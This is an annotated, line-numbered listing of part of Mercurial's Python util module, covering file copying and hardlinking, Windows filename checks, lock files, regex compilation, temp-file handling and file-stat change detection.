1167 try:
1179 try:
1168 oslink(src, dest)
1180 oslink(src, dest)
1169 return
1181 return
1170 except (IOError, OSError):
1182 except (IOError, OSError):
1171 pass # fall back to normal copy
1183 pass # fall back to normal copy
1172 if os.path.islink(src):
1184 if os.path.islink(src):
1173 os.symlink(os.readlink(src), dest)
1185 os.symlink(os.readlink(src), dest)
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1186 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 # for them anyway
1187 # for them anyway
1176 else:
1188 else:
1177 try:
1189 try:
1178 shutil.copyfile(src, dest)
1190 shutil.copyfile(src, dest)
1179 if copystat:
1191 if copystat:
1180 # copystat also copies mode
1192 # copystat also copies mode
1181 shutil.copystat(src, dest)
1193 shutil.copystat(src, dest)
1182 else:
1194 else:
1183 shutil.copymode(src, dest)
1195 shutil.copymode(src, dest)
1184 if oldstat and oldstat.stat:
1196 if oldstat and oldstat.stat:
1185 newstat = filestat.frompath(dest)
1197 newstat = filestat.frompath(dest)
1186 if newstat.isambig(oldstat):
1198 if newstat.isambig(oldstat):
1187 # stat of copied file is ambiguous to original one
1199 # stat of copied file is ambiguous to original one
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1200 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 os.utime(dest, (advanced, advanced))
1201 os.utime(dest, (advanced, advanced))
1190 except shutil.Error as inst:
1202 except shutil.Error as inst:
1191 raise Abort(str(inst))
1203 raise Abort(str(inst))
1192
1204
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1205 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 """Copy a directory tree using hardlinks if possible."""
1206 """Copy a directory tree using hardlinks if possible."""
1195 num = 0
1207 num = 0
1196
1208
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1209 gettopic = lambda: hardlink and _('linking') or _('copying')
1198
1210
1199 if os.path.isdir(src):
1211 if os.path.isdir(src):
1200 if hardlink is None:
1212 if hardlink is None:
1201 hardlink = (os.stat(src).st_dev ==
1213 hardlink = (os.stat(src).st_dev ==
1202 os.stat(os.path.dirname(dst)).st_dev)
1214 os.stat(os.path.dirname(dst)).st_dev)
1203 topic = gettopic()
1215 topic = gettopic()
1204 os.mkdir(dst)
1216 os.mkdir(dst)
1205 for name, kind in listdir(src):
1217 for name, kind in listdir(src):
1206 srcname = os.path.join(src, name)
1218 srcname = os.path.join(src, name)
1207 dstname = os.path.join(dst, name)
1219 dstname = os.path.join(dst, name)
1208 def nprog(t, pos):
1220 def nprog(t, pos):
1209 if pos is not None:
1221 if pos is not None:
1210 return progress(t, pos + num)
1222 return progress(t, pos + num)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1223 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 num += n
1224 num += n
1213 else:
1225 else:
1214 if hardlink is None:
1226 if hardlink is None:
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1227 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 os.stat(os.path.dirname(dst)).st_dev)
1228 os.stat(os.path.dirname(dst)).st_dev)
1217 topic = gettopic()
1229 topic = gettopic()
1218
1230
1219 if hardlink:
1231 if hardlink:
1220 try:
1232 try:
1221 oslink(src, dst)
1233 oslink(src, dst)
1222 except (IOError, OSError):
1234 except (IOError, OSError):
1223 hardlink = False
1235 hardlink = False
1224 shutil.copy(src, dst)
1236 shutil.copy(src, dst)
1225 else:
1237 else:
1226 shutil.copy(src, dst)
1238 shutil.copy(src, dst)
1227 num += 1
1239 num += 1
1228 progress(topic, num)
1240 progress(topic, num)
1229 progress(topic, None)
1241 progress(topic, None)
1230
1242
1231 return hardlink, num
1243 return hardlink, num
1232
1244
1233 _winreservednames = {
1245 _winreservednames = {
1234 'con', 'prn', 'aux', 'nul',
1246 'con', 'prn', 'aux', 'nul',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1247 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1248 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 }
1249 }
1238 _winreservedchars = ':*?"<>|'
1250 _winreservedchars = ':*?"<>|'
1239 def checkwinfilename(path):
1251 def checkwinfilename(path):
1240 r'''Check that the base-relative path is a valid filename on Windows.
1252 r'''Check that the base-relative path is a valid filename on Windows.
1241 Returns None if the path is ok, or a UI string describing the problem.
1253 Returns None if the path is ok, or a UI string describing the problem.
1242
1254
1243 >>> checkwinfilename(b"just/a/normal/path")
1255 >>> checkwinfilename(b"just/a/normal/path")
1244 >>> checkwinfilename(b"foo/bar/con.xml")
1256 >>> checkwinfilename(b"foo/bar/con.xml")
1245 "filename contains 'con', which is reserved on Windows"
1257 "filename contains 'con', which is reserved on Windows"
1246 >>> checkwinfilename(b"foo/con.xml/bar")
1258 >>> checkwinfilename(b"foo/con.xml/bar")
1247 "filename contains 'con', which is reserved on Windows"
1259 "filename contains 'con', which is reserved on Windows"
1248 >>> checkwinfilename(b"foo/bar/xml.con")
1260 >>> checkwinfilename(b"foo/bar/xml.con")
1249 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1261 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1250 "filename contains 'AUX', which is reserved on Windows"
1262 "filename contains 'AUX', which is reserved on Windows"
1251 >>> checkwinfilename(b"foo/bar/bla:.txt")
1263 >>> checkwinfilename(b"foo/bar/bla:.txt")
1252 "filename contains ':', which is reserved on Windows"
1264 "filename contains ':', which is reserved on Windows"
1253 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1265 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1254 "filename contains '\\x07', which is invalid on Windows"
1266 "filename contains '\\x07', which is invalid on Windows"
1255 >>> checkwinfilename(b"foo/bar/bla ")
1267 >>> checkwinfilename(b"foo/bar/bla ")
1256 "filename ends with ' ', which is not allowed on Windows"
1268 "filename ends with ' ', which is not allowed on Windows"
1257 >>> checkwinfilename(b"../bar")
1269 >>> checkwinfilename(b"../bar")
1258 >>> checkwinfilename(b"foo\\")
1270 >>> checkwinfilename(b"foo\\")
1259 "filename ends with '\\', which is invalid on Windows"
1271 "filename ends with '\\', which is invalid on Windows"
1260 >>> checkwinfilename(b"foo\\/bar")
1272 >>> checkwinfilename(b"foo\\/bar")
1261 "directory name ends with '\\', which is invalid on Windows"
1273 "directory name ends with '\\', which is invalid on Windows"
1262 '''
1274 '''
1263 if path.endswith('\\'):
1275 if path.endswith('\\'):
1264 return _("filename ends with '\\', which is invalid on Windows")
1276 return _("filename ends with '\\', which is invalid on Windows")
1265 if '\\/' in path:
1277 if '\\/' in path:
1266 return _("directory name ends with '\\', which is invalid on Windows")
1278 return _("directory name ends with '\\', which is invalid on Windows")
1267 for n in path.replace('\\', '/').split('/'):
1279 for n in path.replace('\\', '/').split('/'):
1268 if not n:
1280 if not n:
1269 continue
1281 continue
1270 for c in _filenamebytestr(n):
1282 for c in _filenamebytestr(n):
1271 if c in _winreservedchars:
1283 if c in _winreservedchars:
1272 return _("filename contains '%s', which is reserved "
1284 return _("filename contains '%s', which is reserved "
1273 "on Windows") % c
1285 "on Windows") % c
1274 if ord(c) <= 31:
1286 if ord(c) <= 31:
1275 return _("filename contains %r, which is invalid "
1287 return _("filename contains %r, which is invalid "
1276 "on Windows") % c
1288 "on Windows") % c
1277 base = n.split('.')[0]
1289 base = n.split('.')[0]
1278 if base and base.lower() in _winreservednames:
1290 if base and base.lower() in _winreservednames:
1279 return _("filename contains '%s', which is reserved "
1291 return _("filename contains '%s', which is reserved "
1280 "on Windows") % base
1292 "on Windows") % base
1281 t = n[-1]
1293 t = n[-1]
1282 if t in '. ' and n not in '..':
1294 if t in '. ' and n not in '..':
1283 return _("filename ends with '%s', which is not allowed "
1295 return _("filename ends with '%s', which is not allowed "
1284 "on Windows") % t
1296 "on Windows") % t
1285
1297
1286 if pycompat.osname == 'nt':
1298 if pycompat.osname == 'nt':
1287 checkosfilename = checkwinfilename
1299 checkosfilename = checkwinfilename
1288 timer = time.clock
1300 timer = time.clock
1289 else:
1301 else:
1290 checkosfilename = platform.checkosfilename
1302 checkosfilename = platform.checkosfilename
1291 timer = time.time
1303 timer = time.time
1292
1304
1293 if safehasattr(time, "perf_counter"):
1305 if safehasattr(time, "perf_counter"):
1294 timer = time.perf_counter
1306 timer = time.perf_counter
1295
1307
1296 def makelock(info, pathname):
1308 def makelock(info, pathname):
1297 try:
1309 try:
1298 return os.symlink(info, pathname)
1310 return os.symlink(info, pathname)
1299 except OSError as why:
1311 except OSError as why:
1300 if why.errno == errno.EEXIST:
1312 if why.errno == errno.EEXIST:
1301 raise
1313 raise
1302 except AttributeError: # no symlink in os
1314 except AttributeError: # no symlink in os
1303 pass
1315 pass
1304
1316
1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1317 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 os.write(ld, info)
1318 os.write(ld, info)
1307 os.close(ld)
1319 os.close(ld)
1308
1320
1309 def readlock(pathname):
1321 def readlock(pathname):
1310 try:
1322 try:
1311 return os.readlink(pathname)
1323 return os.readlink(pathname)
1312 except OSError as why:
1324 except OSError as why:
1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1325 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 raise
1326 raise
1315 except AttributeError: # no symlink in os
1327 except AttributeError: # no symlink in os
1316 pass
1328 pass
1317 fp = posixfile(pathname)
1329 fp = posixfile(pathname)
1318 r = fp.read()
1330 r = fp.read()
1319 fp.close()
1331 fp.close()
1320 return r
1332 return r
1321
1333
1322 def fstat(fp):
1334 def fstat(fp):
1323 '''stat file object that may not have fileno method.'''
1335 '''stat file object that may not have fileno method.'''
1324 try:
1336 try:
1325 return os.fstat(fp.fileno())
1337 return os.fstat(fp.fileno())
1326 except AttributeError:
1338 except AttributeError:
1327 return os.stat(fp.name)
1339 return os.stat(fp.name)
1328
1340
1329 # File system features
1341 # File system features
1330
1342
1331 def fscasesensitive(path):
1343 def fscasesensitive(path):
1332 """
1344 """
1333 Return true if the given path is on a case-sensitive filesystem
1345 Return true if the given path is on a case-sensitive filesystem
1334
1346
1335 Requires a path (like /foo/.hg) ending with a foldable final
1347 Requires a path (like /foo/.hg) ending with a foldable final
1336 directory component.
1348 directory component.
1337 """
1349 """
1338 s1 = os.lstat(path)
1350 s1 = os.lstat(path)
1339 d, b = os.path.split(path)
1351 d, b = os.path.split(path)
1340 b2 = b.upper()
1352 b2 = b.upper()
1341 if b == b2:
1353 if b == b2:
1342 b2 = b.lower()
1354 b2 = b.lower()
1343 if b == b2:
1355 if b == b2:
1344 return True # no evidence against case sensitivity
1356 return True # no evidence against case sensitivity
1345 p2 = os.path.join(d, b2)
1357 p2 = os.path.join(d, b2)
1346 try:
1358 try:
1347 s2 = os.lstat(p2)
1359 s2 = os.lstat(p2)
1348 if s2 == s1:
1360 if s2 == s1:
1349 return False
1361 return False
1350 return True
1362 return True
1351 except OSError:
1363 except OSError:
1352 return True
1364 return True
1353
1365
1354 try:
1366 try:
1355 import re2
1367 import re2
1356 _re2 = None
1368 _re2 = None
1357 except ImportError:
1369 except ImportError:
1358 _re2 = False
1370 _re2 = False
1359
1371
1360 class _re(object):
1372 class _re(object):
1361 def _checkre2(self):
1373 def _checkre2(self):
1362 global _re2
1374 global _re2
1363 try:
1375 try:
1364 # check if match works, see issue3964
1376 # check if match works, see issue3964
1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1377 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 except ImportError:
1378 except ImportError:
1367 _re2 = False
1379 _re2 = False
1368
1380
1369 def compile(self, pat, flags=0):
1381 def compile(self, pat, flags=0):
1370 '''Compile a regular expression, using re2 if possible
1382 '''Compile a regular expression, using re2 if possible
1371
1383
1372 For best performance, use only re2-compatible regexp features. The
1384 For best performance, use only re2-compatible regexp features. The
1373 only flags from the re module that are re2-compatible are
1385 only flags from the re module that are re2-compatible are
1374 IGNORECASE and MULTILINE.'''
1386 IGNORECASE and MULTILINE.'''
1375 if _re2 is None:
1387 if _re2 is None:
1376 self._checkre2()
1388 self._checkre2()
1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1389 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 if flags & remod.IGNORECASE:
1390 if flags & remod.IGNORECASE:
1379 pat = '(?i)' + pat
1391 pat = '(?i)' + pat
1380 if flags & remod.MULTILINE:
1392 if flags & remod.MULTILINE:
1381 pat = '(?m)' + pat
1393 pat = '(?m)' + pat
1382 try:
1394 try:
1383 return re2.compile(pat)
1395 return re2.compile(pat)
1384 except re2.error:
1396 except re2.error:
1385 pass
1397 pass
1386 return remod.compile(pat, flags)
1398 return remod.compile(pat, flags)
1387
1399
1388 @propertycache
1400 @propertycache
1389 def escape(self):
1401 def escape(self):
1390 '''Return the version of escape corresponding to self.compile.
1402 '''Return the version of escape corresponding to self.compile.
1391
1403
1392 This is imperfect because whether re2 or re is used for a particular
1404 This is imperfect because whether re2 or re is used for a particular
1393 function depends on the flags, etc, but it's the best we can do.
1405 function depends on the flags, etc, but it's the best we can do.
1394 '''
1406 '''
1395 global _re2
1407 global _re2
1396 if _re2 is None:
1408 if _re2 is None:
1397 self._checkre2()
1409 self._checkre2()
1398 if _re2:
1410 if _re2:
1399 return re2.escape
1411 return re2.escape
1400 else:
1412 else:
1401 return remod.escape
1413 return remod.escape
1402
1414
1403 re = _re()
1415 re = _re()
1404
1416
1405 _fspathcache = {}
1417 _fspathcache = {}
1406 def fspath(name, root):
1418 def fspath(name, root):
1407 '''Get name in the case stored in the filesystem
1419 '''Get name in the case stored in the filesystem
1408
1420
1409 The name should be relative to root, and be normcase-ed for efficiency.
1421 The name should be relative to root, and be normcase-ed for efficiency.
1410
1422
1411 Note that this function is unnecessary, and should not be
1423 Note that this function is unnecessary, and should not be
1412 called, for case-sensitive filesystems (simply because it's expensive).
1424 called, for case-sensitive filesystems (simply because it's expensive).
1413
1425
1414 The root should be normcase-ed, too.
1426 The root should be normcase-ed, too.
1415 '''
1427 '''
1416 def _makefspathcacheentry(dir):
1428 def _makefspathcacheentry(dir):
1417 return dict((normcase(n), n) for n in os.listdir(dir))
1429 return dict((normcase(n), n) for n in os.listdir(dir))
1418
1430
1419 seps = pycompat.ossep
1431 seps = pycompat.ossep
1420 if pycompat.osaltsep:
1432 if pycompat.osaltsep:
1421 seps = seps + pycompat.osaltsep
1433 seps = seps + pycompat.osaltsep
1422 # Protect backslashes. This gets silly very quickly.
1434 # Protect backslashes. This gets silly very quickly.
1423 seps.replace('\\','\\\\')
1435 seps.replace('\\','\\\\')
1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1436 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 dir = os.path.normpath(root)
1437 dir = os.path.normpath(root)
1426 result = []
1438 result = []
1427 for part, sep in pattern.findall(name):
1439 for part, sep in pattern.findall(name):
1428 if sep:
1440 if sep:
1429 result.append(sep)
1441 result.append(sep)
1430 continue
1442 continue
1431
1443
1432 if dir not in _fspathcache:
1444 if dir not in _fspathcache:
1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1445 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 contents = _fspathcache[dir]
1446 contents = _fspathcache[dir]
1435
1447
1436 found = contents.get(part)
1448 found = contents.get(part)
1437 if not found:
1449 if not found:
1438 # retry "once per directory" per "dirstate.walk" which
1450 # retry "once per directory" per "dirstate.walk" which
1439 # may take place for each patches of "hg qpush", for example
1451 # may take place for each patches of "hg qpush", for example
1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1452 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 found = contents.get(part)
1453 found = contents.get(part)
1442
1454
1443 result.append(found or part)
1455 result.append(found or part)
1444 dir = os.path.join(dir, part)
1456 dir = os.path.join(dir, part)
1445
1457
1446 return ''.join(result)
1458 return ''.join(result)
1447
1459
1448 def getfstype(dirpath):
1460 def getfstype(dirpath):
1449 '''Get the filesystem type name from a directory (best-effort)
1461 '''Get the filesystem type name from a directory (best-effort)
1450
1462
1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1463 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 '''
1464 '''
1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1465 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454
1466
1455 def checknlink(testfile):
1467 def checknlink(testfile):
1456 '''check whether hardlink count reporting works properly'''
1468 '''check whether hardlink count reporting works properly'''
1457
1469
1458 # testfile may be open, so we need a separate file for checking to
1470 # testfile may be open, so we need a separate file for checking to
1459 # work around issue2543 (or testfile may get lost on Samba shares)
1471 # work around issue2543 (or testfile may get lost on Samba shares)
1460 f1, f2, fp = None, None, None
1472 f1, f2, fp = None, None, None
1461 try:
1473 try:
1462 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1474 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1463 suffix='1~', dir=os.path.dirname(testfile))
1475 suffix='1~', dir=os.path.dirname(testfile))
1464 os.close(fd)
1476 os.close(fd)
1465 f2 = '%s2~' % f1[:-2]
1477 f2 = '%s2~' % f1[:-2]
1466
1478
1467 oslink(f1, f2)
1479 oslink(f1, f2)
1468 # nlinks() may behave differently for files on Windows shares if
1480 # nlinks() may behave differently for files on Windows shares if
1469 # the file is open.
1481 # the file is open.
1470 fp = posixfile(f2)
1482 fp = posixfile(f2)
1471 return nlinks(f2) > 1
1483 return nlinks(f2) > 1
1472 except OSError:
1484 except OSError:
1473 return False
1485 return False
1474 finally:
1486 finally:
1475 if fp is not None:
1487 if fp is not None:
1476 fp.close()
1488 fp.close()
1477 for f in (f1, f2):
1489 for f in (f1, f2):
1478 try:
1490 try:
1479 if f is not None:
1491 if f is not None:
1480 os.unlink(f)
1492 os.unlink(f)
1481 except OSError:
1493 except OSError:
1482 pass
1494 pass
1483
1495
1484 def endswithsep(path):
1496 def endswithsep(path):
1485 '''Check path ends with os.sep or os.altsep.'''
1497 '''Check path ends with os.sep or os.altsep.'''
1486 return (path.endswith(pycompat.ossep)
1498 return (path.endswith(pycompat.ossep)
1487 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1499 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1488
1500
1489 def splitpath(path):
1501 def splitpath(path):
1490 '''Split path by os.sep.
1502 '''Split path by os.sep.
1491 Note that this function does not use os.altsep because this is
1503 Note that this function does not use os.altsep because this is
1492 an alternative of simple "xxx.split(os.sep)".
1504 an alternative of simple "xxx.split(os.sep)".
1493 It is recommended to use os.path.normpath() before using this
1505 It is recommended to use os.path.normpath() before using this
1494 function if need.'''
1506 function if need.'''
1495 return path.split(pycompat.ossep)
1507 return path.split(pycompat.ossep)
1496
1508
1497 def gui():
1509 def gui():
1498 '''Are we running in a GUI?'''
1510 '''Are we running in a GUI?'''
1499 if pycompat.sysplatform == 'darwin':
1511 if pycompat.sysplatform == 'darwin':
1500 if 'SSH_CONNECTION' in encoding.environ:
1512 if 'SSH_CONNECTION' in encoding.environ:
1501 # handle SSH access to a box where the user is logged in
1513 # handle SSH access to a box where the user is logged in
1502 return False
1514 return False
1503 elif getattr(osutil, 'isgui', None):
1515 elif getattr(osutil, 'isgui', None):
1504 # check if a CoreGraphics session is available
1516 # check if a CoreGraphics session is available
1505 return osutil.isgui()
1517 return osutil.isgui()
1506 else:
1518 else:
1507 # pure build; use a safe default
1519 # pure build; use a safe default
1508 return True
1520 return True
1509 else:
1521 else:
1510 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1522 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511
1523
1512 def mktempcopy(name, emptyok=False, createmode=None):
1524 def mktempcopy(name, emptyok=False, createmode=None):
1513 """Create a temporary file with the same contents from name
1525 """Create a temporary file with the same contents from name
1514
1526
1515 The permission bits are copied from the original file.
1527 The permission bits are copied from the original file.
1516
1528
1517 If the temporary file is going to be truncated immediately, you
1529 If the temporary file is going to be truncated immediately, you
1518 can use emptyok=True as an optimization.
1530 can use emptyok=True as an optimization.
1519
1531
1520 Returns the name of the temporary file.
1532 Returns the name of the temporary file.
1521 """
1533 """
1522 d, fn = os.path.split(name)
1534 d, fn = os.path.split(name)
1523 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1535 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1524 os.close(fd)
1536 os.close(fd)
1525 # Temporary files are created with mode 0600, which is usually not
1537 # Temporary files are created with mode 0600, which is usually not
1526 # what we want. If the original file already exists, just copy
1538 # what we want. If the original file already exists, just copy
1527 # its mode. Otherwise, manually obey umask.
1539 # its mode. Otherwise, manually obey umask.
1528 copymode(name, temp, createmode)
1540 copymode(name, temp, createmode)
1529 if emptyok:
1541 if emptyok:
1530 return temp
1542 return temp
1531 try:
1543 try:
1532 try:
1544 try:
1533 ifp = posixfile(name, "rb")
1545 ifp = posixfile(name, "rb")
1534 except IOError as inst:
1546 except IOError as inst:
1535 if inst.errno == errno.ENOENT:
1547 if inst.errno == errno.ENOENT:
1536 return temp
1548 return temp
1537 if not getattr(inst, 'filename', None):
1549 if not getattr(inst, 'filename', None):
1538 inst.filename = name
1550 inst.filename = name
1539 raise
1551 raise
1540 ofp = posixfile(temp, "wb")
1552 ofp = posixfile(temp, "wb")
1541 for chunk in filechunkiter(ifp):
1553 for chunk in filechunkiter(ifp):
1542 ofp.write(chunk)
1554 ofp.write(chunk)
1543 ifp.close()
1555 ifp.close()
1544 ofp.close()
1556 ofp.close()
1545 except: # re-raises
1557 except: # re-raises
1546 try: os.unlink(temp)
1558 try: os.unlink(temp)
1547 except OSError: pass
1559 except OSError: pass
1548 raise
1560 raise
1549 return temp
1561 return temp
1550
1562
1551 class filestat(object):
1563 class filestat(object):
1552 """help to exactly detect change of a file
1564 """help to exactly detect change of a file
1553
1565
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1566 'stat' attribute is result of 'os.stat()' if specified 'path'
1555 exists. Otherwise, it is None. This can avoid preparative
1567 exists. Otherwise, it is None. This can avoid preparative
1556 'exists()' examination on client side of this class.
1568 'exists()' examination on client side of this class.
1557 """
1569 """
1558 def __init__(self, stat):
1570 def __init__(self, stat):
1559 self.stat = stat
1571 self.stat = stat
1560
1572
1561 @classmethod
1573 @classmethod
1562 def frompath(cls, path):
1574 def frompath(cls, path):
1563 try:
1575 try:
1564 stat = os.stat(path)
1576 stat = os.stat(path)
1565 except OSError as err:
1577 except OSError as err:
1566 if err.errno != errno.ENOENT:
1578 if err.errno != errno.ENOENT:
1567 raise
1579 raise
1568 stat = None
1580 stat = None
1569 return cls(stat)
1581 return cls(stat)
1570
1582
1571 @classmethod
1583 @classmethod
1572 def fromfp(cls, fp):
1584 def fromfp(cls, fp):
1573 stat = os.fstat(fp.fileno())
1585 stat = os.fstat(fp.fileno())
1574 return cls(stat)
1586 return cls(stat)
1575
1587
1576 __hash__ = object.__hash__
1588 __hash__ = object.__hash__
1577
1589
1578 def __eq__(self, old):
1590 def __eq__(self, old):
1579 try:
1591 try:
1580 # if ambiguity between stat of new and old file is
1592 # if ambiguity between stat of new and old file is
1581 # avoided, comparison of size, ctime and mtime is enough
1593 # avoided, comparison of size, ctime and mtime is enough
1582 # to exactly detect change of a file regardless of platform
1594 # to exactly detect change of a file regardless of platform
1583 return (self.stat.st_size == old.stat.st_size and
1595 return (self.stat.st_size == old.stat.st_size and
1584 self.stat.st_ctime == old.stat.st_ctime and
1596 self.stat.st_ctime == old.stat.st_ctime and
1585 self.stat.st_mtime == old.stat.st_mtime)
1597 self.stat.st_mtime == old.stat.st_mtime)
1586 except AttributeError:
1598 except AttributeError:
1587 pass
1599 pass
1588 try:
1600 try:
1589 return self.stat is None and old.stat is None
1601 return self.stat is None and old.stat is None
1590 except AttributeError:
1602 except AttributeError:
1591 return False
1603 return False
1592
1604
1593 def isambig(self, old):
1605 def isambig(self, old):
1594 """Examine whether new (= self) stat is ambiguous against old one
1606 """Examine whether new (= self) stat is ambiguous against old one
1595
1607
1596 "S[N]" below means stat of a file at N-th change:
1608 "S[N]" below means stat of a file at N-th change:
1597
1609
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1610 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 - S[n-1].ctime == S[n].ctime
1611 - S[n-1].ctime == S[n].ctime
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1612 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1613 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1614 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1615 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604
1616
1605 Case (*2) above means that a file was changed twice or more at
1617 Case (*2) above means that a file was changed twice or more at
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1618 same time in sec (= S[n-1].ctime), and comparison of timestamp
1607 is ambiguous.
1619 is ambiguous.
1608
1620
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1621 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1610 timestamp is ambiguous".
1622 timestamp is ambiguous".
1611
1623
1612 But advancing mtime only in case (*2) doesn't work as
1624 But advancing mtime only in case (*2) doesn't work as
1613 expected, because naturally advanced S[n].mtime in case (*1)
1625 expected, because naturally advanced S[n].mtime in case (*1)
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1626 might be equal to manually advanced S[n-1 or earlier].mtime.
1615
1627
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1628 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1629 treated as ambiguous regardless of mtime, to avoid overlooking
1618 by confliction between such mtime.
1630 by confliction between such mtime.
1619
1631
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1632 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 S[n].mtime", even if size of a file isn't changed.
1633 S[n].mtime", even if size of a file isn't changed.
1622 """
1634 """
1623 try:
1635 try:
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1636 return (self.stat.st_ctime == old.stat.st_ctime)
1625 except AttributeError:
1637 except AttributeError:
1626 return False
1638 return False
1627
1639
1628 def avoidambig(self, path, old):
1640 def avoidambig(self, path, old):
1629 """Change file stat of specified path to avoid ambiguity
1641 """Change file stat of specified path to avoid ambiguity
1630
1642
1631 'old' should be previous filestat of 'path'.
1643 'old' should be previous filestat of 'path'.
1632
1644
1633 This skips avoiding ambiguity, if a process doesn't have
1645 This skips avoiding ambiguity, if a process doesn't have
1634 appropriate privileges for 'path'. This returns False in this
1646 appropriate privileges for 'path'. This returns False in this
1635 case.
1647 case.
1636
1648
1637 Otherwise, this returns True, as "ambiguity is avoided".
1649 Otherwise, this returns True, as "ambiguity is avoided".
1638 """
1650 """
1639 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1651 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1640 try:
1652 try:
1641 os.utime(path, (advanced, advanced))
1653 os.utime(path, (advanced, advanced))
1642 except OSError as inst:
1654 except OSError as inst:
1643 if inst.errno == errno.EPERM:
1655 if inst.errno == errno.EPERM:
1644 # utime() on the file created by another user causes EPERM,
1656 # utime() on the file created by another user causes EPERM,
1645 # if a process doesn't have appropriate privileges
1657 # if a process doesn't have appropriate privileges
1646 return False
1658 return False
1647 raise
1659 raise
1648 return True
1660 return True
1649
1661
1650 def __ne__(self, other):
1662 def __ne__(self, other):
1651 return not self == other
1663 return not self == other
1652
1664
1653 class atomictempfile(object):
1665 class atomictempfile(object):
1654 '''writable file object that atomically updates a file
1666 '''writable file object that atomically updates a file
1655
1667
1656 All writes will go to a temporary copy of the original file. Call
1668 All writes will go to a temporary copy of the original file. Call
1657 close() when you are done writing, and atomictempfile will rename
1669 close() when you are done writing, and atomictempfile will rename
1658 the temporary copy to the original name, making the changes
1670 the temporary copy to the original name, making the changes
1659 visible. If the object is destroyed without being closed, all your
1671 visible. If the object is destroyed without being closed, all your
1660 writes are discarded.
1672 writes are discarded.
1661
1673
1662 checkambig argument of constructor is used with filestat, and is
1674 checkambig argument of constructor is used with filestat, and is
1663 useful only if target file is guarded by any lock (e.g. repo.lock
1675 useful only if target file is guarded by any lock (e.g. repo.lock
1664 or repo.wlock).
1676 or repo.wlock).
1665 '''
1677 '''
1666 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1678 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1667 self.__name = name # permanent name
1679 self.__name = name # permanent name
1668 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1680 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1669 createmode=createmode)
1681 createmode=createmode)
1670 self._fp = posixfile(self._tempname, mode)
1682 self._fp = posixfile(self._tempname, mode)
